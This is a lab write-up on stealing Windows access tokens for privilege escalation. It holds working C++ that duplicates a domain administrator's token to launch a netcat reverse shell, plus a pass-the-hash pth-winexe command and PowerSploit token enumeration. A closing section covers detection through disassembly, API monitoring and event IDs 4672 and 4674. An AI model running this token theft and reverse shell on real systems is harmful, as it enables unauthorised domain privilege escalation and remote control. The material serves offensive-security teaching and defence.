description |
Defense Evasion, Privilege Escalation by stealing an re-using security access tokens. |
One of the techniques of token manipulation is creating a new process with a token "stolen" from another process. This is when a token of an already existing access token present in one of the running processes on the victim host, is retrieved, duplicated and then used for creating a new process, making the new process assume the privileges of that stolen token.
A high level process of the token stealing that will be carried out in this lab is as follows:
Step | Win32 API |
Open a process with access token you want to steal | OpenProcess |
Get a handle to the access token of that process | OpenProcesToken |
Make a duplicate of the access token present in that process | DuplicateTokenEx |
Create a new process with the newly aquired access token | CreateProcessWithTokenW |
Below is the C++ code implementing the above process. Note the variable PID_TO_IMPERSONATE
that has a value of 3060
This is a process ID that we want to impersonate/steal the token from, since it is running as a domain admin and makes it for a good target:
Note the line 16, which specifies the executable that should be launched with an impersonated token, which in our case effectively is a simple netcat reverse shell calling back to the attacking system:
This is the code if you want to compile and try it yourself:
{% code-tabs %} {% code-tabs-item title="tokens.cpp" %}
#include "stdafx.h"
#include <windows.h>
#include <iostream>
int main(int argc, char * argv[]) {
char a;
HANDLE processHandle;
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
wchar_t cmdline[] = L"C:\\shell.cmd";
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE);
OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle);
DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation);
std::cin >> a;
return 0;
{% endcode-tabs-item %} {% endcode-tabs %}
Launching Tokens.exe
from the powershell console spawns a reverse shell that the attacker catches. Note how the powershell.exe
- the parent process of Tokens.exe
and Tokens.exe
itself are running under PC-Mantvydas\mantvydas
, but the newly spawned shell is running under OFFENSE\Administrator
- this is because of the successful token theft:
The logon for OFFESNE\administrator in the above test was of logon type 2 (interactive logon, meaning I launched a new process on the victim system using a runas /user:administrator@offense cmd
Another quick test that I wanted to do was a theft of an access token that was present in the system due to a network logon (i.e psexec, winexec, pth-winexe, etc), so I spawned a cmd shell remotely from the attacking machine to the victim machine using:
{% code-tabs %} {% code-tabs-item title="attacker@local" %}
pth-winexe // -U offense/administrator%pass cmd
{% endcode-tabs-item %} {% endcode-tabs %}
which created a new process on the victim system with a PID of 4780:
Enumerating all the access tokens on the victim system with PowerSploit:
Invoke-TokenManipulation -ShowAll | ft -Wrap -Property domain,username,tokentype,logontype,processid the below. Note the available token (highlighted) - it is the cmd.exe from above screenshot and its logon type is as expected - 3 - a network logon:
This token again can be stolen the same way we did it earlier. Let's change the PID in Tokens.cpp
of the process we want to impersonate to 4780
Running the compiled code invokes a new process with the newly stolen token:
note the cmd.exe has a PID 5188 - if we rerun the Invoke-TokenManipulation
, we can see the new process is using the access token with logon type 3:
Imagine you were investigating the host we stole the tokens from, because it exhibited some anomalous behaviour. In this particularly contrived example, since Tokens.exe
was written to the disk on the victim system, you could have a quick look at its dissasembly and conclude it is attempting to manipulate access tokens - note that we can see the victim process PID and the CMDLINE arguments:
As suggested by the above, you should think about API monitoring if you want to detect these token manipulations on endpoints, but beware - this can be quite noisy.
Windows event logs of IDs 4672
and 4674
may be helpful for you as a defender also - below shows a network logon of a pth-winexe // -U offense/administrator%pass cmd
and then later, a netcat reverse shell originating from the same logon session:
{% embed url="" %}
{% embed url="" %}
{% embed url="\#-security-primary-token-gly" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="\(v=vs.85\).aspx" %}
{% embed url="" %}
{% embed url="\(v=vs.85\).aspx" %}
{% embed url="\_2BKn3QR8" %}